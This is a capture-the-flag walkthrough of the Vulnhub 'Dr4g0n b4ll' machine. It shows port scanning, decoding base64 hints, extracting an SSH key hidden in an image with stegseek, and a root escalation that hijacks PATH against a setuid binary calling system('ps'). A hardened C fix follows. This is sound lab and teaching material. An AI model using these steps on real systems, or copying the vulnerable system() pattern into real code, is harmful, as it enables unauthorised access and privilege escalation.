Dr4g0n b4ll
Identifying the target host's IP address
This VM has a problem obtaining an IP address automatically from VirtualBox; refer to my related article to resolve that first.
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:2b:cc:72 1 60 PCS Systemtechnik GmbH
192.168.56.189 08:00:27:a0:27:82 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.189.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.189 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-18 06:39 EST
Nmap scan report for bogon (192.168.56.189)
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b5:77:4c:88:d7:27:54:1c:56:1d:48:d9:a4:1e:28:91 (RSA)
| 256 c6:a8:c8:9e:ed:0d:67:1f:ae:ad:6b:d5:dd:f1:57:a1 (ECDSA)
|_ 256 fa:a9:b0:e3:06:2b:92:63:ba:11:2f:94:d6:31:90:b2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: DRAGON BALL | Aj's
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A0:27:82 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.31 seconds
According to the Nmap scan results, the target host has 2 open ports: 22 (SSH) and 80 (HTTP).
Get Access
Browsing to port 80, the source of the returned page contains the following comment:
<!-- VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09 -->
It looks like several layers of base64 encoding:
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ echo "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" |base64 -d
UkZKQlIwOU9JRUpCVEV3PQ==
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ echo "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" |base64 -d |base64 -d
RFJBR09OIEJBTEw=
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ echo "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" |base64 -d |base64 -d | base64 -d
DRAGON BALL
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$
That does not seem useful yet, so set it aside for now and check whether there are any directories worth looking at.
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ curl http://192.168.56.189/robots.txt
eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI=
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ curl http://192.168.56.189/robots.txt | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 33 100 33 0 0 9428 0 --:--:-- --:--:-- --:--:-- 11000
you find the hidden dir
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ echo "eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI=" | base64 -d
you find the hidden dir
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$
Does "hidden" mean a directory whose name starts with a dot?
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ wfuzz -c -u http://192.168.56.189/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 31
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.189/.FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Could the "DRAGON BALL" decoded from the page source be a directory? (Oh, it turns out directory names can contain spaces, which is why I never considered that DRAGON BALL might be a directory.)
http://192.168.56.189/DRAGON%20BALL/
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ curl http://192.168.56.189/DRAGON%20BALL/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /DRAGON BALL</title>
</head>
<body>
<h1>Index of /DRAGON BALL</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="Vulnhub/">Vulnhub/</a></td><td align="right">2021-01-05 07:15 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="secret.txt">secret.txt</a></td><td align="right">2021-01-05 02:51 </td><td align="right">183 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.189 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ curl http://192.168.56.189/DRAGON%20BALL/secret.txt
/facebook.com
/youtube.com
/google.com
/vanakkam nanba
/customer
/customers
/taxonomy
/username
/passwd
/yesterday
/yshop
/zboard
/zeus
/aj.html
/zoom.html
/zero.html
/welcome.html
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ wget http://192.168.56.189/DRAGON%20BALL/Vulnhub/aj.jpg
--2022-11-18 07:48:36-- http://192.168.56.189/DRAGON%20BALL/Vulnhub/aj.jpg
Connecting to 192.168.56.189:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75168 (73K) [image/jpeg]
Saving to: ‘aj.jpg’
aj.jpg 100%[=================================================================================================================================>] 73.41K --.-KB/s in 0s
2022-11-18 07:48:36 (519 MB/s) - ‘aj.jpg’ saved [75168/75168]
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ ls
aj.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ steghide extract -sf aj.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ stegseek aj.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "love"
[i] Original filename: "id_rsa".
[i] Extracting to "aj.jpg.out".
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ ls
aj.jpg aj.jpg.out nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ cat aj.jpg.out
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
This is a private key, but what is the username?
And are the entries in secret.txt directories or something else? Requesting them only returns not found.
http://192.168.56.189/DRAGON%20BALL/Vulnhub/login.html
This returns a login form with the text "Welcome xmen".
So the username is guessed to be xmen, and the private key obtained earlier is used to log in over SSH.
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ chmod 400 aj.jpg.out
┌──(kali㉿kali)-[~/Vulnhub/Dr4g0n_b4ll]
└─$ ssh -i aj.jpg.out xmen@192.168.56.189
Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 5 07:09:06 2021 from 192.168.43.111
xmen@debian:~$ id
uid=1000(xmen) gid=1000(xmen) groups=1000(xmen),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
xmen@debian:~$ cat local.txt
your falg :192fb6275698b5ad9868c7afb62fd555xmen@debian:~$
xmen@debian:~$
User flag obtained.
Privilege escalation
xmen@debian:/home$ cd xmen
xmen@debian:~$ ls -alh
total 36K
drwxr-xr-x 4 xmen xmen 4.0K Jan 5 2021 .
drwxr-xr-x 3 root root 4.0K Jan 4 2021 ..
-rw------- 1 xmen xmen 543 Jan 5 2021 .bash_history
-rw-r--r-- 1 xmen xmen 220 Jan 3 2021 .bash_logout
-rw-r--r-- 1 xmen xmen 3.5K Jan 3 2021 .bashrc
-rw-r--r-- 1 xmen xmen 43 Jan 2 2021 local.txt
-rw-r--r-- 1 xmen xmen 807 Jan 3 2021 .profile
drwxr-xr-x 2 root root 4.0K Jan 4 2021 script
drwx------ 2 xmen xmen 4.0K Jan 4 2021 .ssh
xmen@debian:~$ cd script
xmen@debian:~/script$ ls
demo.c shell
xmen@debian:~/script$ cat demo.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */
int main(void)
{
    setuid(0);
    setgid(0);
    system("ps");     /* relative command name: resolved through the caller's PATH via /bin/sh */
    return 0;
}
xmen@debian:~/script$ ls
demo.c shell
xmen@debian:~/script$ strings shell
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
demo.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
./shell can obtain root privileges, and analysing it shows that it corresponds to demo.c (the source filename appears in its strings output). So could a new demo.c with the same name be generated to escalate privileges?
But looking at the script directory, the xmen user has no permission to write files there. Instead, create a file named ps in /tmp whose content is /bin/bash, and prepend /tmp to the PATH environment variable.
xmen@debian:/tmp$ echo "/bin/bash" > ps
xmen@debian:/tmp$ chmod 777 ps
xmen@debian:~/script$ export PATH="/tmp:$PATH"
xmen@debian:~/script$ cat $PATH
cat: '/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games': No such file or directory
xmen@debian:~/script$ more $PATH
more: stat of /tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games failed: No such file or directory
xmen@debian:~/script$ ./shell
root@debian:~/script# cd /root
root@debian:/root# ls -ahl
total 32K
drwx------ 4 root root 4.0K Jan 5 2021 .
drwxr-xr-x 18 root root 4.0K Jan 3 2021 ..
-rw------- 1 root root 2.3K Jan 5 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Jan 3 2021 .local
-rw------- 1 root root 0 Jan 3 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 509 Jan 5 2021 proof.txt
drwx------ 2 root root 4.0K Jan 4 2021 .ssh
root@debian:/root# cat proof.txt
_____ __________
/ \\______ \ ___ ___ _____ ____ ____
/ \ / \| _/ \ \/ // \_/ __ \ / \
/ Y \ | \ > <| Y Y \ ___/| | \
\____|__ /____|_ /__________/__/\_ \__|_| /\___ >___| /
\/ \/_____/_____/ \/ \/ \/ \/
join channel: https://t.me/joinchat/St01KnXzcGeWMKSC
your flag: 031f7d2d89b9dd2da3396a0d7b7fb3e2
root@debian:/root#
Root flag obtained. The key to the privilege escalation is understanding that demo.c executes system("ps") without an absolute path, so placing a ps file in /tmp (a fake ps that is really /bin/bash) and putting /tmp first in PATH is enough to escalate privileges.
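The fix a defender would apply to demo.c, as an added example that is not part of the original write-up or of the VM: the command must be an absolute path under a system binary directory, it is run with execve() and a fixed environment rather than system(), and the privilege calls are checked. The function names is_trusted_command and run_privileged and the allow-list of directories are my own choices.

```c
/* Hardened counterpart of demo.c (added example). demo.c is exploitable
 * because system("ps") resolves "ps" via the caller's PATH and runs it
 * through /bin/sh with the caller's environment. */
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Accept only "/dir/name" with dir a system binary directory; a relative
 * name or any extra '/' (e.g. "/bin/../tmp/ps") is rejected. */
int is_trusted_command(const char *cmd) {
    static const char *const dirs[] = { "/bin/", "/usr/bin/", "/sbin/", "/usr/sbin/" };
    if (cmd == NULL || cmd[0] != '/')
        return 0;
    for (size_t i = 0; i < sizeof dirs / sizeof dirs[0]; i++) {
        size_t n = strlen(dirs[i]);
        if (strncmp(cmd, dirs[i], n) == 0 && cmd[n] != '\0' &&
            strchr(cmd + n, '/') == NULL)
            return 1;
    }
    return 0;
}

/* Run cmd as root via execve() with a fixed, minimal environment.
 * Returns the child's exit status, or -1 if refused or failed. */
int run_privileged(const char *cmd) {
    static char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    if (!is_trusted_command(cmd))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* setgid before setuid, and stop if either call fails. */
        if (setgid(0) != 0 || setuid(0) != 0)
            _exit(127);
        char *const argv[] = { (char *)cmd, NULL };
        execve(cmd, argv, envp);   /* never consults PATH */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    return run_privileged("/bin/ps") == 0 ? 0 : 1;
}
```

With this version a ps placed in /tmp is never found, because the command is resolved only as the literal absolute path and the child's PATH does not contain /tmp.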
Tags: b4ll, kali, Dr4g0n, xmen, Vulnhub, root
Source: https://www.cnblogs.com/jason-huawen/p/16904937.html